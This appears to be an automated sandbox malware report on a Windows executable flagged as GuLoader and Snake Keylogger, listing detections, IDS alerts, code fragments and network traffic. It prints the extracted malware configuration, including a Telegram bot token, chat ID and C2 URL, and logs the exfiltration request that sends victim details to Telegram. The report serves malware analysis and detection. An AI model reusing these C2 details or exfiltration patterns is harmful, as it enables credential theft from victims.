Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hUMdKouQ1H.exe

Overview

General Information

Sample name:hUMdKouQ1H.exe
renamed because original name is a hash value
Original sample name:0f370e4f496e7324bc7a46014e66d3fb5a3817c397b1b5bd148b567489a07b4f.exe
Analysis ID:1632359
MD5:5fb01ef00670917a1de3961d00203ba5
SHA1:b0247f6ceecd0ac6df28bb53de595aeb367c8dc8
SHA256:0f370e4f496e7324bc7a46014e66d3fb5a3817c397b1b5bd148b567489a07b4f
Tags:exesignedVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • hUMdKouQ1H.exe (PID: 8064 cmdline: "C:\Users\user\Desktop\hUMdKouQ1H.exe" MD5: 5FB01EF00670917A1DE3961D00203BA5)
    • hUMdKouQ1H.exe (PID: 7952 cmdline: "C:\Users\user\Desktop\hUMdKouQ1H.exe" MD5: 5FB01EF00670917A1DE3961D00203BA5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME", "Chat_id": "7160883909", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.2581266703.0000000003CDB000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: hUMdKouQ1H.exe PID: 7952JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: hUMdKouQ1H.exe PID: 7952JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:52:27.466703+010028033053Unknown Traffic192.168.2.549704104.21.48.1443TCP
            2025-03-07T22:52:33.453669+010028033053Unknown Traffic192.168.2.549706104.21.48.1443TCP
            2025-03-07T22:52:49.697008+010028033053Unknown Traffic192.168.2.549711104.21.48.1443TCP
            2025-03-07T22:53:01.297303+010028033053Unknown Traffic192.168.2.549714104.21.48.1443TCP
            2025-03-07T22:53:24.473888+010028033053Unknown Traffic192.168.2.549719104.21.48.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:52:17.115409+010028032742Potentially Bad Traffic192.168.2.549702193.122.130.080TCP
            2025-03-07T22:52:18.146641+010028032742Potentially Bad Traffic192.168.2.549702193.122.130.080TCP
            2025-03-07T22:52:23.193580+010028032742Potentially Bad Traffic192.168.2.549702193.122.130.080TCP
            2025-03-07T22:52:28.974629+010028032742Potentially Bad Traffic192.168.2.549705193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:52:04.079838+010028032702Potentially Bad Traffic192.168.2.549700142.250.186.110443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:53:32.253154+010018100071Potentially Bad Traffic192.168.2.549720149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: hUMdKouQ1H.exeAvira: detected
            Source: 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME", "Chat_id": "7160883909", "Version": "4.4"}
            Source: hUMdKouQ1H.exe.7952.10.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME/sendMessage"}
            Source: hUMdKouQ1H.exeVirustotal: Detection: 63%Perma Link
            Source: hUMdKouQ1H.exeReversingLabs: Detection: 50%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C98880 CryptUnprotectData,10_2_04C98880
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C98EF1 CryptUnprotectData,10_2_04C98EF1
            Source: hUMdKouQ1H.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49703 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49709 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49714 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49717 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49719 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.5:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: hUMdKouQ1H.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_0040646B FindFirstFileA,FindClose,10_2_0040646B
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_004027A1 FindFirstFileA,10_2_004027A1
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,10_2_004058BF
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04BFF6DDh10_2_04BFF540
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04BFF6DDh10_2_04BFF72C
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C73080h10_2_04C72C68
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C72941h10_2_04C72690
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7F0A9h10_2_04C7EE00
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7CDE9h10_2_04C7CB40
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7E3A1h10_2_04C7E0F8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7DF49h10_2_04C7DCA0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_04C70040
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7DAF1h10_2_04C7D848
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_04C70853
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C73080h10_2_04C72C62
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7EC51h10_2_04C7E9A8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7E7F9h10_2_04C7E550
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7F959h10_2_04C7F6B0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7F501h10_2_04C7F258
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_04C70673
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7D699h10_2_04C7D3F0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7D241h10_2_04C7CF98
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C73080h10_2_04C72FAE
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C7FDB1h10_2_04C7FB08
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C70D0Dh10_2_04C70B30
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C716F8h10_2_04C70B30
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C97571h10_2_04C972C8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9C39Fh10_2_04C9C0D0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C93709h10_2_04C93460
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C99280h10_2_04C98FB0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C97EB5h10_2_04C97B78
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9E38Fh10_2_04C9E0C0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C95179h10_2_04C94ED0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9A3AFh10_2_04C9A0E0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C90B99h10_2_04C908F0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C96733h10_2_04C96488
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9D14Fh10_2_04C9CE80
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C90741h10_2_04C90498
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9B15Fh10_2_04C9AE90
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C92151h10_2_04C91EA8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C902E9h10_2_04C90040
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9BF0Fh10_2_04C9BC40
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C91CF9h10_2_04C91A50
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C99F1Fh10_2_04C99C50
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C94D21h10_2_04C94A78
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C97119h10_2_04C96E70
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9F13Fh10_2_04C9EE70
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C932B1h10_2_04C93008
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9ACCFh10_2_04C9AA00
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C96CC1h10_2_04C96A18
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C948C9h10_2_04C94620
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C962D9h10_2_04C96030
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9DEFFh10_2_04C9DC30
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C99A8Fh10_2_04C997C0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C95E81h10_2_04C95BD8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9ECAFh10_2_04C9E9E0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C918A1h10_2_04C915F8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9CCBFh10_2_04C9C9F0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C95A29h10_2_04C95780
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9FA5Fh10_2_04C9F790
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C91449h10_2_04C911A0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9DA6Fh10_2_04C9D7A0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C92E59h10_2_04C92BB0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9BA7Fh10_2_04C9B7B0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C90FF1h10_2_04C90D48
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C92A01h10_2_04C92758
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9E81Fh10_2_04C9E550
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9C82Fh10_2_04C9C560
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9A83Fh10_2_04C9A570
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C925A9h10_2_04C92300
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9F5CFh10_2_04C9F300
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9D5DFh10_2_04C9D310
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C955D1h10_2_04C95328
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C979C9h10_2_04C97720
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04C9B5EFh10_2_04C9B320
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBF5E8h10_2_04CBF2F0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB0767h10_2_04CB0498
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB6B40h10_2_04CB6848
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB47E8h10_2_04CB4478
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB6678h10_2_04CB6380
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB4E90h10_2_04CB4B98
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBAE30h10_2_04CBAB38
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBB7C0h10_2_04CBB4C8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB3997h10_2_04CB36C8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB19A7h10_2_04CB16D8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB9FD8h10_2_04CB9CE0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB87F0h10_2_04CB84F8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB9180h10_2_04CB8E88
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB2757h10_2_04CB2488
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBE790h10_2_04CBE498
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB7998h10_2_04CB76A0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB61B0h10_2_04CB5EB8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBCFA8h10_2_04CBCCB0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB1517h10_2_04CB1248
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBD938h10_2_04CBD640
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB02E7h10_2_04CB0040
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBC150h10_2_04CBBE58
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB5358h10_2_04CB5060
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBA968h10_2_04CBA670
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBB2F8h10_2_04CBB000
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB9B10h10_2_04CB9818
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBF120h10_2_04CBEE28
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB3507h10_2_04CB3238
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB8328h10_2_04CB8030
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB8CB8h10_2_04CB89C0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB74D0h10_2_04CB71D8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBE2C8h10_2_04CBDFD0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB42B7h10_2_04CB3FE8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBCAE0h10_2_04CBC7E8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB22C7h10_2_04CB1FF8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB5CE8h10_2_04CB59F0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBBC88h10_2_04CBB990
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBA4A0h10_2_04CBA1A8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB3078h10_2_04CB2DA8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB1087h10_2_04CB0DB8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBFAB0h10_2_04CBF7B8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB3E27h10_2_04CB3B58
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB9648h10_2_04CB9350
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB1E37h10_2_04CB1B68
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB7E60h10_2_04CB7B68
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBEC59h10_2_04CBE960
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBD470h10_2_04CBD178
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBDE00h10_2_04CBDB08
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB2BE7h10_2_04CB2918
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB7008h10_2_04CB6D10
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB5820h10_2_04CB5528
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CB0BF7h10_2_04CB0928
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 04CBC618h10_2_04CBC320
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_050EEF08
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_050EEF07
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_050EF21E
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 050F0800h10_2_050F0508
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then jmp 050F0338h10_2_050F0040
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_38562A80
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_38562A21

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49720 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:992547%0D%0ADate%20and%20Time:%2011/03/2025%20/%2019:20:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20992547%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
            Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49702 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49700 -> 142.250.186.110:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.21.48.1:443
